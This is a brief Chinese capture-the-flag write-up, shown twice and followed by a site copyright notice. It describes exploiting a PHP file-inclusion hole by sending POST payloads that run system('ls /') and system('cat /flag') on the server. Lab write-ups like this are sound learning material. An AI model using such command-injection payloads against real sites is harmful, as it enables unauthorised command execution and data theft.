开启题目
点击下面的 phpinfo 跳转之后发现查看到了 PHP版本,根据源码可以感觉到这里有文件包含,查看之后发现 allow 的配置都开着
抓包之后把 GET 换成 POST,构造 payload 发包,发现根目录有一个 flag 文件
<?php system('ls /');?>
使用 cat 命令查看 flag 文件发现了 flag
<?php system('cat /flag');?>
开启题目
点击下面的 phpinfo 跳转之后发现查看到了 PHP版本,根据源码可以感觉到这里有文件包含,查看之后发现 allow 的配置都开着
抓包之后把 GET 换成 POST,构造 payload 发包,发现根目录有一个 flag 文件
<?php system('ls /');?>
使用 cat 命令查看 flag 文件发现了 flag
<?php system('cat /flag');?>
版权声明:
本网仅为发布的内容提供存储空间,不对发表、转载的内容提供任何形式的保证。凡本网注明“来源:XXX网络”的作品,均转载自其它媒体,著作权归作者所有,商业转载请联系作者获得授权,非商业转载请注明出处。
我们尊重并感谢每一位作者,均已注明文章来源和作者。如因作品内容、版权或其它问题,请及时与我们联系,联系邮箱:809451989@qq.com,投稿邮箱:809451989@qq.com